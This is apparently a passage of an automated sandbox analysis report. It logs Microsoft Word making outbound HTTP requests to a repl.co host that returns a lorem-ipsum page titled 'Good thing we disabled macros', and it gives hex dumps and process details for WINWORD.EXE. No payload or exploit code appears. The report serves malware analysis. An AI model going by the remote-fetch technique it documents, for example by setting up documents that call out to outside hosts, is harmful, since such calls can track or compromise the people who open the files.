            Data Ascii: quis eleifend nec, suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus.Morbi c


            Session IDSource IPSource PortDestination IPDestination PortProcess
            4192.168.2.224917735.186.245.55443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampkBytes transferredDirectionData
            2022-08-18 02:23:26 UTC8OUTHEAD /index.html HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: dullghostwhitetwintext.karewen.repl.co
            Content-Length: 0
            Connection: Keep-Alive
            2022-08-18 02:23:26 UTC8INHTTP/1.1 200 OK
            Content-Length: 5901
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:26 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758075; includeSubDomains
            Connection: close


            Session IDSource IPSource PortDestination IPDestination PortProcess
            5192.168.2.224917835.186.245.55443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampkBytes transferredDirectionData
            2022-08-18 02:23:27 UTC9OUTHEAD /index.html HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: dullghostwhitetwintext.karewen.repl.co
            Content-Length: 0
            Connection: Keep-Alive
            2022-08-18 02:23:27 UTC9INHTTP/1.1 200 OK
            Content-Length: 5901
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:27 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758074; includeSubDomains
            Connection: close


            Session IDSource IPSource PortDestination IPDestination PortProcess
            6192.168.2.224917935.186.245.55443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampkBytes transferredDirectionData
            2022-08-18 02:23:27 UTC9OUTOPTIONS / HTTP/1.1
            User-Agent: Microsoft Office Protocol Discovery
            Host: dullghostwhitetwintext.karewen.repl.co
            Content-Length: 0
            Connection: Keep-Alive
            2022-08-18 02:23:27 UTC9INHTTP/1.1 404 Not Found
            Content-Length: 207
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:27 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758074; includeSubDomains
            Connection: close
            2022-08-18 02:23:27 UTC10INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


            Session IDSource IPSource PortDestination IPDestination PortProcess
            7192.168.2.224918034.149.204.188443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampkBytes transferredDirectionData
            2022-08-18 02:23:28 UTC10OUTHEAD /index.html HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft Office Existence Discovery
            Host: dullghostwhitetwintext.karewen.repl.co
            2022-08-18 02:23:28 UTC10INHTTP/1.1 200 OK
            Content-Length: 5901
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:28 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758073; includeSubDomains
            Connection: close


            Session IDSource IPSource PortDestination IPDestination PortProcess
            8192.168.2.224918135.186.245.55443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampkBytes transferredDirectionData
            2022-08-18 02:23:28 UTC10OUTGET /index.html HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            Host: dullghostwhitetwintext.karewen.repl.co
            Connection: Keep-Alive
            2022-08-18 02:23:28 UTC11INHTTP/1.1 200 OK
            Content-Length: 5901
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:28 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758073; includeSubDomains
            Connection: close
            2022-08-18 02:23:28 UTC11INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0a 47 6f 6f 64 20 74 68 69 6e 67 20 77 65 20 64 69 73 61 62 6c 65 64 20 6d 61 63 72 6f 73 0a 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 3e 0a 4c 6f 72 65 6d 20 69 70 73 75 6d 20 64 6f 6c 6f 72 20 73 69 74 20 61 6d 65 74 2c 20 63 6f 6e 73 65 63 74 65 74 75 72 20 61 64 69 70 69 73 63 69 6e 67 20 65 6c 69 74 2e 20 51 75 69 73 71 75 65 20 70 65 6c 6c 65 6e 74 65 73 71 75 65 20 65 67 65 73 74 61 73 20 6e 75 6c 6c 61 20 69 6e 20 64 69 67 6e 69 73 73 69 6d 2e 20 4e 61 6d 20 69 64 20 6d 61 75 72 69 73 20 6c 6f 72 65 6d 2e 20 4e 75 6e 63 20 73 75 73 63 69 70 69 74 20 69 64 20 6d 61 67 6e 61
            Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna
            2022-08-18 02:23:28 UTC12INData Raw: 2c 20 73 65 6d 70 65 72 20 74 75 72 70 69 73 20 75 74 2c 20 67 72 61 76 69 64 61 20 6c 6f 72 65 6d 2e 20 50 72 6f 69 6e 20 61 72 63 75 20 6c 69 67 75 6c 61 2c 20 76 65 6e 65 6e 61 74 69 73 20 61 6c 69 71 75 61 6d 20 74 72 69 73 74 69 71 75 65 20 75 74 2c 20 70 72 65 74 69 75 6d 20 71 75 69 73 20 76 65 6c 69 74 2e 0a 0a 50 68 61 73 65 6c 6c 75 73 20 74 72 69 73 74 69 71 75 65 20 6f 72 63 69 20 65 6e 69 6d 2c 20 61 74 20 61 63 63 75 6d 73 61 6e 20 76 65 6c 69 74 20 69 6e 74 65 72 64 75 6d 20 65 74 2e 20 41 65 6e 65 61 6e 20 6e 65 63 20 74 72 69 73 74 69 71 75 65 20 61 6e 74 65 2c 20 64 69 67 6e 69 73 73 69 6d 20 63 6f 6e 76 61 6c 6c 69 73 20 6c 69 67 75 6c 61 2e 20 41 65 6e 65 61 6e 20 71 75 69 73 20 66 65 6c 69 73 20 64 6f 6c 6f 72 2e 20 49 6e 20 71 75 69
            Data Ascii: , semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In qui
            2022-08-18 02:23:28 UTC14INData Raw: 73 2c 20 74 75 72 70 69 73 20 64 6f 6c 6f 72 20 65 6c 65 69 66 65 6e 64 20 6d 61 73 73 61 2c 20 69 6e 20 6d 61 78 69 6d 75 73 20 73 61 70 69 65 6e 20 64 75 69 20 65 74 20 74 6f 72 74 6f 72 2e 20 51 75 69 73 71 75 65 20 76 61 72 69 75 73 20 65 6e 69 6d 20 73 65 64 20 65 6e 69 6d 20 76 65 6e 65 6e 61 74 69 73 20 74 65 6d 70 6f 72 2e 20 50 72 61 65 73 65 6e 74 20 71 75 69 73 20 76 6f 6c 75 74 70 61 74 20 6c 6f 72 65 6d 2e 20 50 65 6c 6c 65 6e 74 65 73 71 75 65 20 61 63 20 76 65 6e 65 6e 61 74 69 73 20 6c 61 63 75 73 2c 20 76 69 74 61 65 20 63 6f 6d 6d 6f 64 6f 20 6f 64 69 6f 2e 20 53 65 64 20 69 6e 20 6d 65 74 75 73 20 61 74 20 6c 69 62 65 72 6f 20 76 69 76 65 72 72 61 20 6d 6f 6c 6c 69 73 20 73 65 64 20 76 69 74 61 65 20 6e 69 62 68 2e 20 53 65 64 20 61 74
            Data Ascii: s, turpis dolor eleifend massa, in maximus sapien dui et tortor. Quisque varius enim sed enim venenatis tempor. Praesent quis volutpat lorem. Pellentesque ac venenatis lacus, vitae commodo odio. Sed in metus at libero viverra mollis sed vitae nibh. Sed at
            2022-08-18 02:23:28 UTC15INData Raw: 20 71 75 69 73 20 65 6c 65 69 66 65 6e 64 20 6e 65 63 2c 20 73 75 73 63 69 70 69 74 20 73 69 74 20 61 6d 65 74 20 6d 61 73 73 61 2e 20 56 69 76 61 6d 75 73 20 69 6e 20 6c 65 63 74 75 73 20 65 72 61 74 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 56 69 76 61 6d 75 73 20 73 65 64 20 6d 61 73 73 61 20 71 75 69 73 20 61 72 63 75 20 65 67 65 73 74 61 73 20 76 65 68 69 63 75 6c 61 2e 20 4e 75 6c 6c 61 20 6d 61 73 73 61 20 6c 6f 72 65 6d 2c 20 74 69 6e 63 69 64 75 6e 74 20 73 65 64 20 66 65 75 67 69 61 74 20 71 75 69 73 2c 20 66 61 75 63 69 62 75 73 20 61 20 72 69 73 75 73 2e 20 53 65 64 20 76 69 76 65 72 72 61 20 74 75 72 70 69 73 20 73 69 74 20 61 6d 65 74 20 6d 65 74 75 73 20 69 61 63 75 6c 69 73 20 66 69 6e 69 62 75 73 2e 0a 0a 4d 6f 72 62 69 20 63
            Data Ascii: quis eleifend nec, suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus.Morbi c


            Session IDSource IPSource PortDestination IPDestination PortProcess
            9192.168.2.224918235.186.245.55443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampkBytes transferredDirectionData
            2022-08-18 02:23:29 UTC17OUTHEAD /index.html HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: dullghostwhitetwintext.karewen.repl.co
            Content-Length: 0
            Connection: Keep-Alive
            2022-08-18 02:23:29 UTC17INHTTP/1.1 200 OK
            Content-Length: 5901
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:29 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758072; includeSubDomains
            Connection: close


            No statistics
            Target ID:0
            Start time:04:22:15
            Start date:18/08/2022
            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Imagebase:0x13fd60000
            File size:1423704 bytes
            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            No disassembly